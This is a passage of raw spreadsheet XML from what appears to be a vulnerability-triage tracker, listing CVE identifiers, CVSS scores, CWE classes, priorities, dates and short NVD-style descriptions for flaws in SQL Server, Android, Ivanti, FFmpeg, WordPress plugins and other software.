t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F97" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G97" s="5" t="inlineStr" /><c r="H97" s="5" t="n"><v>0.005</v></c><c r="I97" s="5" t="inlineStr" /><c r="J97" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K97" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L97" s="5" t="inlineStr" /><c r="M97" s="5" t="inlineStr" /><c r="N97" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O97" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P97" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q97" s="5" t="inlineStr" /><c r="R97" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S97" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T97" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t></is></c></row><row r="98"><c r="A98" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B98" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C98" s="5" t="inlineStr"><is><t>CVE-2026-69854</t></is></c><c r="D98" s="5" t="n"><v>9</v></c><c r="E98" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F98" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G98" s="5" t="inlineStr" /><c r="H98" s="5" t="n"><v>0.006</v></c><c r="I98" s="5" t="inlineStr" /><c r="J98" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K98" s="5" t="inlineStr" /><c r="L98" s="5" t="inlineStr" /><c r="M98" s="5" t="inlineStr" /><c r="N98" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O98" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P98" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q98" s="5" t="inlineStr" /><c r="R98" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S98" s="5" t="inlineStr"><is><t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T98" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t></is></c></row><row r="99"><c r="A99" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B99" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C99" s="5" t="inlineStr"><is><t>CVE-2026-85982</t></is></c><c r="D99" s="5" t="n"><v>9</v></c><c r="E99" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F99" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G99" s="5" t="inlineStr" /><c r="H99" s="5" t="n"><v>0.002</v></c><c r="I99" s="5" t="inlineStr" /><c r="J99" s="5" t="inlineStr" /><c r="K99" s="5" t="inlineStr" /><c r="L99" s="5" t="inlineStr" /><c r="M99" s="5" t="inlineStr" /><c r="N99" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P99" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q99" s="5" t="inlineStr" /><c r="R99" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S99" s="5" t="inlineStr"><is><t>The Auth0 AD/LDAP Connector is vulnerable to stored Cross-Site Scripting (XSS) issues due to improper HTML encoding of data in search results and updater log content displayed in the admin panel. An authenticated user with privileges to modify directory attributes, or a low-privileged local user on the host where the connector is installed, could insert script content. This script content could then execute in an administrator's browser when they view the affected search results or update logs.</t></is></c><c r="T99" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85982</t></is></c></row><row r="100"><c r="A100" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C100" s="5" t="inlineStr"><is><t>CVE-2026-50093</t></is></c><c r="D100" s="5" t="n"><v>8.9</v></c><c r="E100" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F100" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G100" s="5" t="inlineStr" /><c r="H100" s="5" t="n"><v>0.002</v></c><c r="I100" s="5" t="inlineStr" /><c r="J100" s="5" t="inlineStr" /><c r="K100" s="5" t="inlineStr" /><c r="L100" s="5" t="inlineStr" /><c r="M100" s="5" t="inlineStr" /><c r="N100" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q100" s="5" t="inlineStr" /><c r="R100" s="5" t="inlineStr"><is><t>CWE-434</t></is></c><c r="S100" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Siveillance Control Pro V3.0 (All versions &lt; V3.0.12.2173), Siveillance Control Pro V4.0 (All versions &lt; V4.0.9.2178), Siveillance Control V3.0 (All versions &lt; V3.0.22.2177), Siveillance Control V4.0 (All versions &lt; V4.0.11.2177). A vulnerability in the OIS web module allows an attacker to upload arbitrary files to the server. Successful exploitation of this vulnerability could allow an attacker to gain root access on the host system, potentially leading to a full compromise of the affected OIS environment.</t></is></c><c r="T100" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50093</t></is></c></row><row r="101"><c r="A101" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B101" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C101" s="5" t="inlineStr"><is><t>CVE-2026-12648</t></is></c><c r="D101" s="5" t="n"><v>8.800000000000001</v></c><c r="E101" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F101" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G101" s="5" t="inlineStr" /><c r="H101" s="5" t="n"><v>0.015</v></c><c r="I101" s="5" t="inlineStr" /><c r="J101" s="5" t="inlineStr" /><c r="K101" s="5" t="inlineStr" /><c r="L101" s="5" t="inlineStr" /><c r="M101" s="5" t="inlineStr" /><c r="N101" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O101" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P101" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q101" s="5" t="inlineStr" /><c r="R101" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S101" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T101" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12648</t></is></c></row><row r="102"><c r="A102" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C102" s="5" t="inlineStr"><is><t>CVE-2026-12651</t></is></c><c r="D102" s="5" t="n"><v>8.800000000000001</v></c><c r="E102" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F102" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G102" s="5" t="inlineStr" /><c r="H102" s="5" t="n"><v>0.015</v></c><c r="I102" s="5" t="inlineStr" /><c r="J102" s="5" t="inlineStr" /><c r="K102" s="5" t="inlineStr" /><c r="L102" s="5" t="inlineStr" /><c r="M102" s="5" t="inlineStr" /><c r="N102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P102" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q102" s="5" t="inlineStr" /><c r="R102" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S102" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T102" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12651</t></is></c></row><row r="103"><c r="A103" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C103" s="5" t="inlineStr"><is><t>CVE-2026-16502</t></is></c><c r="D103" s="5" t="n"><v>8.800000000000001</v></c><c r="E103" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F103" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G103" s="5" t="inlineStr" /><c r="H103" s="5" t="n"><v>0.005</v></c><c r="I103" s="5" t="inlineStr" /><c r="J103" s="5" t="inlineStr" /><c r="K103" s="5" t="inlineStr" /><c r="L103" s="5" t="inlineStr" /><c r="M103" s="5" t="inlineStr" /><c r="N103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q103" s="5" t="inlineStr" /><c r="R103" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S103" s="5" t="inlineStr"><is><t>The Live Composer – Free WordPress Website Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.1.18 via deserialization of untrusted input . This makes it possible for authenticated attackers, with contributor-level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is></c><c r="T103" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16502</t></is></c></row><row r="104"><c r="A104" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C104" s="5" t="inlineStr"><is><t>CVE-2026-18851</t></is></c><c r="D104" s="5" t="n"><v>8.800000000000001</v></c><c r="E104" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F104" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G104" s="5" t="inlineStr" /><c r="H104" s="5" t="n"><v>0.01</v></c><c r="I104" s="5" t="inlineStr" /><c r="J104" s="5" t="inlineStr" /><c r="K104" s="5" t="inlineStr"><is><t>ivanti:endpoint_manager_mobile</t></is></c><c r="L104" s="5" t="inlineStr" /><c r="M104" s="5" t="inlineStr" /><c r="N104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P104" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q104" s="5" t="inlineStr" /><c r="R104" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S104" s="5" t="inlineStr"><is><t>Missing authorization in Ivanti Endpoint Manager Mobile before version 12.10.0.0, 12.9.0.2, and 12.8.0.4 allows a remote authenticated attacker to escalate their privileges to admin.</t></is></c><c r="T104" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18851</t></is></c></row><row r="105"><c r="A105" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C105" s="5" t="inlineStr"><is><t>CVE-2026-28609</t></is></c><c r="D105" s="5" t="n"><v>8.800000000000001</v></c><c r="E105" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F105" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G105" s="5" t="inlineStr" /><c r="H105" s="5" t="n"><v>0.003</v></c><c r="I105" s="5" t="inlineStr" /><c r="J105" s="5" t="inlineStr" /><c r="K105" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L105" s="5" t="inlineStr" /><c r="M105" s="5" t="inlineStr" /><c r="N105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P105" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q105" s="5" t="inlineStr" /><c r="R105" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S105" s="5" t="inlineStr"><is><t>In read of MatroskaExtractor.cpp, there is a possible out-of-bounds write due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28609</t></is></c></row><row r="106"><c r="A106" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C106" s="5" t="inlineStr"><is><t>CVE-2026-28618</t></is></c><c r="D106" s="5" t="n"><v>8.800000000000001</v></c><c r="E106" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F106" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G106" s="5" t="inlineStr" /><c r="H106" s="5" t="n"><v>0.003</v></c><c r="I106" s="5" t="inlineStr" /><c r="J106" s="5" t="inlineStr" /><c r="K106" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L106" s="5" t="inlineStr" /><c r="M106" s="5" t="inlineStr" /><c r="N106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P106" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q106" s="5" t="inlineStr" /><c r="R106" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S106" s="5" t="inlineStr"><is><t>In dec_frm_prepare of oapv.c, there is a possible OOB write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28618</t></is></c></row><row r="107"><c r="A107" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C107" s="5" t="inlineStr"><is><t>CVE-2026-28666</t></is></c><c r="D107" s="5" t="n"><v>8.800000000000001</v></c><c r="E107" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F107" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G107" s="5" t="inlineStr" /><c r="H107" s="5" t="n"><v>0.003</v></c><c r="I107" s="5" t="inlineStr" /><c r="J107" s="5" t="inlineStr" /><c r="K107" s="5" t="inlineStr" /><c r="L107" s="5" t="inlineStr" /><c r="M107" s="5" t="inlineStr" /><c r="N107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P107" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q107" s="5" t="inlineStr" /><c r="R107" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S107" s="5" t="inlineStr"><is><t>In multiple functions of LocalImageResolver.java, there is a possible Remote Persistent Denial of Service due to a DNG image rendering check bypass. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t></is></c></row><row r="108"><c r="A108" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C108" s="5" t="inlineStr"><is><t>CVE-2026-30754</t></is></c><c r="D108" s="5" t="n"><v>8.800000000000001</v></c><c r="E108" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F108" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G108" s="5" t="inlineStr" /><c r="H108" s="5" t="n"><v>0.003</v></c><c r="I108" s="5" t="inlineStr" /><c r="J108" s="5" t="inlineStr" /><c r="K108" s="5" t="inlineStr" /><c r="L108" s="5" t="inlineStr" /><c r="M108" s="5" t="inlineStr" /><c r="N108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P108" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q108" s="5" t="inlineStr" /><c r="R108" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S108" s="5" t="inlineStr"><is><t>A memory corruption vulnerability exists in FFmpeg before 8.1. The RTP encoding process. In the nal_send function in libavformat/rtpenc_h264_hevc.c, a negative size parameter (size=-3) is passed to memcpy when transmitting H.264/HEVC streams via RTP using a crafted input file. This was detected using AddressSanitizer.</t></is></c><c r="T108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-30754</t></is></c></row><row r="109"><c r="A109" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C109" s="5" t="inlineStr"><is><t>CVE-2026-49879</t></is></c><c r="D109" s="5" t="n"><v>8.800000000000001</v></c><c r="E109" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F109" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G109" s="5" t="inlineStr" /><c r="H109" s="5" t="n"><v>0.003</v></c><c r="I109" s="5" t="inlineStr" /><c r="J109" s="5" t="inlineStr" /><c r="K109" s="5" t="inlineStr" /><c r="L109" s="5" t="inlineStr" /><c r="M109" s="5" t="inlineStr" /><c r="N109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P109" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q109" s="5" t="inlineStr" /><c r="R109" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S109" s="5" t="inlineStr"><is><t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49879</t></is></c></row><row r="110"><c r="A110" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C110" s="5" t="inlineStr"><is><t>CVE-2026-49882</t></is></c><c r="D110" s="5" t="n"><v>8.800000000000001</v></c><c r="E110" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F110" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G110" s="5" t="inlineStr" /><c r="H110" s="5" t="n"><v>0.003</v></c><c r="I110" s="5" t="inlineStr" /><c r="J110" s="5" t="inlineStr" /><c r="K110" s="5" t="inlineStr" /><c r="L110" s="5" t="inlineStr" /><c r="M110" s="5" t="inlineStr" /><c r="N110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P110" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q110" s="5" t="inlineStr" /><c r="R110" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S110" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49882</t></is></c></row><row r="111"><c r="A111" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C111" s="5" t="inlineStr"><is><t>CVE-2026-62706</t></is></c><c r="D111" s="5" t="n"><v>8.800000000000001</v></c><c r="E111" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F111" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G111" s="5" t="inlineStr" /><c r="H111" s="5" t="n"><v>0.006</v></c><c r="I111" s="5" t="inlineStr" /><c r="J111" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K11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11" s="5" t="inlineStr" /><c r="M111" s="5" t="inlineStr" /><c r="N111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P111" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q111" s="5" t="inlineStr" /><c r="R111" s="5" t="inlineStr"><is><t>CWE-121, CWE-125</t></is></c><c r="S111" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t></is></c></row><row r="112"><c r="A112" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B112" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C112" s="5" t="inlineStr"><is><t>CVE-2026-62744</t></is></c><c r="D112" s="5" t="n"><v>8.800000000000001</v></c><c r="E112" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F112" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G112" s="5" t="inlineStr" /><c r="H112" s="5" t="n"><v>0.008</v></c><c r="I112" s="5" t="inlineStr" /><c r="J112" s="5" t="inlineStr" /><c r="K112" s="5" t="inlineStr" /><c r="L112" s="5" t="inlineStr" /><c r="M112" s="5" t="inlineStr" /><c r="N112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P112" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q112" s="5" t="inlineStr" /><c r="R112" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S112" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t></is></c></row><row r="113"><c r="A113" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B113" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C113" s="5" t="inlineStr"><is><t>CVE-2026-62895</t></is></c><c r="D113" s="5" t="n"><v>8.800000000000001</v></c><c r="E113" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F113" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G113" s="5" t="inlineStr" /><c r="H113" s="5" t="n"><v>0.007</v></c><c r="I113" s="5" t="inlineStr" /><c r="J113" s="5" t="inlineStr" /><c r="K113" s="5" t="inlineStr" /><c r="L113" s="5" t="inlineStr" /><c r="M113" s="5" t="inlineStr" /><c r="N113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O113" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P113" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q113" s="5" t="inlineStr" /><c r="R113" s="5" t="inlineStr"><is><t>CWE-1390, CWE-89, CWE-942</t></is></c><c r="S113" s="5" t="inlineStr"><is><t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t></is></c></row><row r="114"><c r="A114" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B114" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C114" s="5" t="inlineStr"><is><t>CVE-2026-65772</t></is></c><c r="D114" s="5" t="n"><v>8.800000000000001</v></c><c r="E114" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F114" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G114" s="5" t="inlineStr" /><c r="H114" s="5" t="n"><v>0.008999999999999999</v></c><c r="I114" s="5" t="inlineStr" /><c r="J114" s="5" t="inlineStr" /><c r="K114" s="5" t="inlineStr" /><c r="L114" s="5" t="inlineStr" /><c r="M114" s="5" t="inlineStr" /><c r="N114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O114" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P114" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q114" s="5" t="inlineStr" /><c r="R114" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S114" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t></is></c><c r="T114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t></is></c></row><row r="115"><c r="A115" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B115" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C115" s="5" t="inlineStr"><is><t>CVE-2026-66814</t></is></c><c r="D115" s="5" t="n"><v>8.800000000000001</v></c><c r="E115" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F115" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G115" s="5" t="inlineStr" /><c r="H115" s="5" t="n"><v>0.004</v></c><c r="I115" s="5" t="inlineStr" /><c r="J115" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K115" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L115" s="5" t="inlineStr" /><c r="M115" s="5" t="inlineStr" /><c r="N115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O115" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P115" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q115" s="5" t="inlineStr" /><c r="R115" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S115" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t></is></c></row><row r="116"><c r="A116" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B116" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C116" s="5" t="inlineStr"><is><t>CVE-2026-66818</t></is></c><c r="D116" s="5" t="n"><v>8.800000000000001</v></c><c r="E116" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F116" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G116" s="5" t="inlineStr" /><c r="H116" s="5" t="n"><v>0.006</v></c><c r="I116" s="5" t="inlineStr" /><c r="J116" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K116" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L116" s="5" t="inlineStr" /><c r="M116" s="5" t="inlineStr" /><c r="N116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O116" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P116" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q116" s="5" t="inlineStr" /><c r="R116" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S116" s="5" t="inlineStr"><is><t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t></is></c></row><row r="117"><c r="A117" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B117" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C117" s="5" t="inlineStr"><is><t>CVE-2026-66819</t></is></c><c r="D117" s="5" t="n"><v>8.800000000000001</v></c><c r="E117" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F117" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G117" s="5" t="inlineStr" /><c r="H117" s="5" t="n"><v>0.007</v></c><c r="I117" s="5" t="inlineStr" /><c r="J117" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K117" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L117" s="5" t="inlineStr" /><c r="M117" s="5" t="inlineStr" /><c r="N117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P117" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q117" s="5" t="inlineStr" /><c r="R117" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S117" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t></is></c></row><row r="118"><c r="A118" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B118" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C118" s="5" t="inlineStr"><is><t>CVE-2026-66820</t></is></c><c r="D118" s="5" t="n"><v>8.800000000000001</v></c><c r="E118" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F118" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G118" s="5" 